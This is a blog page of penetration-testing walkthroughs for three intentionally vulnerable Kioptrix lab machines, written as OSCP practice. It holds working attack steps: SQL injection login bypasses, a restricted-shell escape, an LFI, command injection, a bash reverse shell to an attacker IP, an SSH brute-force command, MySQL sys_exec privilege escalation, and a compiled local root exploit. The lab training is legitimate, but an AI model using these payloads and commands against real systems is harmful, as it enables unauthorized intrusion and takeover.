Kioptrix Level 4 Walkthrough (OSCP friendly)


Kioptrix level 4 walkthrough. (OSCP Friendly)

Starting with Enumeration and finding low hanging fruits , but since its level 4 it is expected to not have a quick root exploit.

So Nmap tells us the following info, I am not going to write the basic nmap commands go with default scripts , enumerate versions , top port scan , udp scan, in case you couldn’t find any service in top ports scan go with full port scan (-p-).

Services-
22 SSH-
               OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
               No exploit for this version using searchsploit.
              
80 Web Server
               Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
               No specific exploit for 2.2.8 with searchsploit

139,445 Samba-
               Samba smbd 3.0.28a (workgroup: WORKGROUP)
               There is a null session but No drives listing accessible
               Enum4linux gives us the users: loneferret , john , Robert , root

Browsing the WebServer, gives us a login page. Tried SQL Injection commands. With username john from the smb enum.
Password = ‘or ‘1’ = ‘1 ( WORKED)




We got creds to login via ssh.
John:MyNameIsJohn
Lets login
We have a restricted shell, help command give us the allowed commands, we need to find a way to get out of this jail with the limited tools we have in this jail.

Using,
Echo os.system(‘/bin/bash’)
Bring us out of the jail, we have a full bash shell now.
Enumerating now for Priviledge escalation.
We have python,netcat,wget on this machine.
We don’t have gcc installed, means we can’t compile an exploit here.,
I tried wget from attacker machine it doesn’t work, seems something is blocking it, tried port 80,1337,4444. None worked, lets get back to it later.
While checking processes running as root with command
Ps aux|grep root
I found mysql running as root.
In Home folder there is a file called checklogin.php  with database credentials.

$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name


Lets login into mysql
Mysql -h localhost -u root -p
We are in…
Show databases;

Select * from members;
We got another user account info. The password can be in straight text or base64 encoding, I didn’t try.

Now we need to google how to run system commands from mysql as functions.
So, in order to run system commands from mysql we need sys_exec function and for that we need a library “lib_mysqludf_sys.so”
Select * from mysql.func;
Will tell us whether we have that library file.
Time to do the magic.
Select sys_exec(‘usermod -a -G admin john’);
We are adding the user john to admin group. Once Done, user john can change user to root. By sudo su.

Rooted!!!
During the process I was trying to transfer files but it was not getting transferred. Looking at the iptables rules, we figured out the ports blocked by firewall rules.
Using a port not in the iptables list, allowed us to transfer files.




 



 574r570rm
Posted by at No comments:
Labels: , ,

Kioptrix 3 Walkthrough (OSCP friendly)

Kioptrix level 3 Walkthrough OSCP friendly.


Lets start the VM, the welcome screen has initial useful info.

We need to update the /etc/hosts file with the ip of the VM and kioptrix3.com.
Operating System is Ubuntu 8.04.3.
Nmap show us Multiple ports and services open.
Lets quickly check ssh and webserver for low hanging fruits.
Upon Enumeration of ssh, no exploits was found for OpenSSH 4.7p1.
Checking web server, no exploits were found for Apache 2.2.8.
Browsing through kioptrix3.com , we found some useful information. The gallery app and username.
Lets check both of these further.
Since we have the username now , lets do a bruteforcing attack on ssh in the background.
Using medusa for brute forcing ssh, reason its reliable for ssh bruteforce.
medusa -h 192.168.78.141 -u loneferret -P /usr/share/wordlists/fasttrack.txt  -M ssh

In Web application the login page URL seems suspicious, looks like it is using the page name as argument.
http://kioptrix3.com/index.php?system=Admin
Upon checking it for LFI, I managed to exploit the LFI.
The /etc/passwd file also confirmed the username loneferret.

Let’s check again on our brute force progress.
Excellent, Medusa found the password for user loneferret.
Lets login via SSH.
I used multiple scripts to check for priv esc hint but couldn’t find any useful thing. So I went to the user’s home folder and here we had 2 files, one of them is company's profile.
Upon using sudo ht I faced an error of no xterm-256 color , something like that. Google told me how to fix it.
Export TERM=xterm
And now we can run sudo ht.
Eventually ht is an application run as root, so whatever you do in ht app, it will be done as root.
Lets give ourself permission to login as root , obviously 😊
But there is one !/usr/bin/su already added. Lets check sudo su
So we had to have /bin/su in sudoers file in order to use it. Do that and BINGO!!!
ROOT DANCE!!

 




 574r570rm
Posted by at No comments:
Labels: , ,

Kioptrix level 2 Walkthrough

Kioptrix is a series of vulnhub machines. Below is the walkthrough of the second machine of this series. The walkthrough is oscp friendly.


Kioptrix level 2
Lets Start with Nmap
Command used : nmap -sC -sV 192.168.78.140


We’ve got a number of ports open.
I started with openssh 3.9p1, searched for an exploit on exploit-db but couldn’t found a version specific.
Moving on to port 80 ,The WebServer. We are greeted by the following screen.

A login page, lets do a bruteforce on it in the background and try basic sql injection on the authorization system.
Upon giving username as test and Password as  test’or 1=1#-- -
We got in.

What do we have here… a program to run ping command. But ping command is a system command. Lets try if it can run multiple system commands with ;
YES , we execute the following commands for system enumeration for a shell.
Whoami;hostname;cat /etc/passwd
Which nc
Which python
The results told us there is no netcat on the machine, but we have bash and python on the machine. We can use both to get a shell.
Let’s consult the pentest monkey reverse shell guide.

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
what should we do when there is no netcat, use bash.
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
listen for the incoming shell on attacker machine and we popped a shell.
Time for Privilege escalation journey.
I searched for kernel exploits, tried a few but it failed, because requirements of the exploits were not met.
Then I searched for CENTOS 4.5 and found 2 exploits for priv esc, exactly what we need.
Using the first one.
Searchsploit -m exploits/linux_x86/local/9542.c

Download it on attacker machine, transfer it to the victim machine… wget is there to help us.
Compile the exploit on target machine since we have GCC compiler installed there.
gcc 9542.c -o 9542
Give executable permissions to the compiled binary.
chmod +x 9542
and Execute it.
./9542
BINGO!!!
We are root






574r570rm
Posted by at No comments:
Labels:
Subscribe to: Posts (Atom)

Regulatory Compliance and SOC 2: Which Industries and Regulatory Standards Require SOC 2?

Regulatory Compliance and SOC 2: Which Industries and Regulatory Standards Require SOC 2? SOC 2 compliance has become a critical benchmark f...